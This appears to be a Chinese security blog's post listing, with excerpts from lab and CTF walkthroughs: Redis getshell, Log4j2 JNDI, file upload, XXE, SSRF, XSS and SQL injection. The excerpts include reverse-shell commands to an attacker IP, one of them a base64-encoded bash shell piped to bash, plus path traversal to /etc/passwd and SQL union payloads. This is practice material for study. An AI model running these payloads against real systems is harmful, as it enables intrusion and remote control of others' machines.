duanjiaxu6666的博客

原创 redis未授权getshell四种方式

在Reids 4.x之后，Redis新增了模块功能，通过外部拓展，可以实现在Redis中实现一个新的Redis命令，通过写C语言编译并加载恶意的.so文件，达到代码执行的目的。set shell "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/攻击机的ip/端口 0>&1\n\n"到靶机上查看，计划任务写入成功，我们试试编辑root，将里面的ip与端口改成我们的ip试试看，不行。写入成功，这儿我写错了，应该写攻击机的ip与端口，开启监听之后，等待反弹就行了。

原创 Red靶机攻略

使用php伪协议访问:http://redrocks.win/NetworkFileManagerPHP.php?建立pass.txt文件,将之前配置文件那个密码放入,然后利用hashcat对应的base64规则去枚举相关的密码,存入passlist.txt中,格式是类似于之前获得的那个密码的,最好利用hydra进行爆破,获得对应的密码。

原创 jangow-01-1.0.1靶机攻略

jangow靶机练习到此结束。

原创 Earth靶机攻略

首先将我们解压好的的Earth.ova放入虚拟机里，并配置环境将网络连接换成NET连接key:finalshell监听66端口:使用base64编码,使用这个命令查看base64加密后的结果:将刚才加密的密文进行解密，在刚才界面去执行这段代码echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTgyLjEzMC82NiA8JjEK | base64 -d | bashearth靶机练习到此结束

原创 大米cms的逻辑支付漏洞/cmseasy

原创 Web-Machine-N7靶机攻略

N7靶机练习到此结束。

原创 matrix-breakout-2-morpheus靶机攻略

(1)使用kali的dirb进行目录扫描,依次访问robots.txt,server-stauts,javascript/jquery/jquery,访问过后并无有用信息，我们访问robots.txt目录时，提示我们再找一找，我们需要借助别的工具扫描。(2)使用gobuster再次扫描，下载bobuster，使用apt install gobuster下载gobuster,使用。(3)依次访问graffiti.txt与greffiti.php查看有无有用信息。(2)依次访问80,81端口看有无有用信息。

原创 CTF技能树-Web进阶-php-Bypass disable_function通关攻略

原创 Log4j2漏洞攻略

6.拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址...们⽣成了恶意代码类，并且⽣成了对应的url，然后我们就可以回到刚才的⽹站去进⾏JNDI注⼊...先在⾃⼰搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果。去另外⼀个监控终端看看shell有没有弹回来且⽤。4.以上可以看到有三个服务，看到熟悉的。执⾏以下命令启动靶场环境并在浏览器访问。这⾥在注⼊之前另启动⼀个终端开启监听。，实际上这个jar的作⽤就是帮我。获取到root权限了。开始反弹Shell准备。

原创 常见的中间件漏洞（文件解析漏洞）

Nginx解析漏洞。

原创 tomato文件包含漏洞靶机攻略

(5)由这个php语句不难发现，他是以GET形式传递了一个image参数,使用image参数赋值查看/etc/passwd用户配置文件,一层一层往里切,../,当第五个../的时候页面最下面由回显，判断路径为:?(2)发现有一个antibots文件夹，打开文件夹，发现其下边有一个php.info页面，访问。(4)查看页面源代码，发现存在include()高危函数，可能存在文件包含漏洞。(2)依次访问80端口与8888端口，看有无有用信息。

原创 AI-WEB1.0靶机攻略

分别选择4-php、Y和2-绝对路径，并输入拼接的上述找到的网站根路径与上传路径 /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads。(5)文件夹名为uploads，猜测可能存在文件上传漏洞，依次访问上述php文件，发现一个文件上传页面。(4)使用dirsearch工具对目录/m3diNf0进行扫描，发现info.php文件。(1)使用dirsearch工具对网站目录进行扫描，发现robots.txt文件。

原创 upload-labs详解

在网上查了一下，说黑名单规则不严谨，在某些特定环境中某些特殊后缀仍会被当作php文件解析 php、php2、php3、php4、php5、php6、php7、pht、phtm、phtml。将这串代码写入到我们的1.php文件中，点击上传抓包，发送到攻击模块，清除payload位置，选择无payload，无限重复攻击，访问127.0.0.1/upload/1.php直至出现shell.php为止。先上传.htaccess文件后上传我们的.jpg文件，这样我们的jpg文件就会被解析成php文件。

原创 XXE靶机-LAB-1

由于用户名和密码是在admin.php文件中发现的，访问admin.php进行登录，点击flag发现页面Not Found，但是有一个新文件名：flagmeout.php。由于文件名为.flag.php，在本机phpstudy的WWW目录下新建一个flag.php文件，将乱码拷贝进来，并添加php的开始和结束标签<?直接访问robots.txt文件，发现网页后台，有一个目录/xxe和一个文件admin.php。再对Base32解密后的结果进行Base64解密，结果为/etc/.flag.php。

原创 CTFHub技能树Web-SSRF通关攻略

浏览器访问gopher一次编码,等待时间过长，直接访问shell.php看是否生成,进入木马地址，逐级寻找flag,得到flag。进入题目,url访问flag.php，没有这个文件,url访问index.php页面被解析，有这个文件,启动gopher程序。url访问flag，得到回显禁止127，172的开头访问，尝试localhost进行访问，页面得到flag。url访问flag，直接在url后面输入127.0.0.1/flag.php，得到flag。

原创 在pikachu练习平台练习xss反射形注入

alert(1)

原创 墨者学院SQL注入手工测试(持续更新中)

接下来使用-1 union select null,column name,'null',null from information schema.columns wheretable_schema='public' and table name='reg users' limit 1 offset 0 //id来查列(字段)1 union select (select table name from user tables where rownum=1),'nul' from dual//第一个表。

原创 sqli-labs通关攻略（持续更新中）

1'union select 1,2,3 --+ //将id=1改成id=-1，此时它没有结果，我们联合查询的数据就上来了1'union select 1,database(),3 --+ //通过database()数据库函数，查出网站当前使用的数据库的名字。​ 尝试 id=1‘ and 1=1 --+ 反应正常 （id=1’ and 1=2 --+ 反应错误） 说明是字符型注入。加上 id=1 and 1=1 --+ 反应正常 （id=1 and 1=2 --+ 反应也正常) 说明不是数字型注入。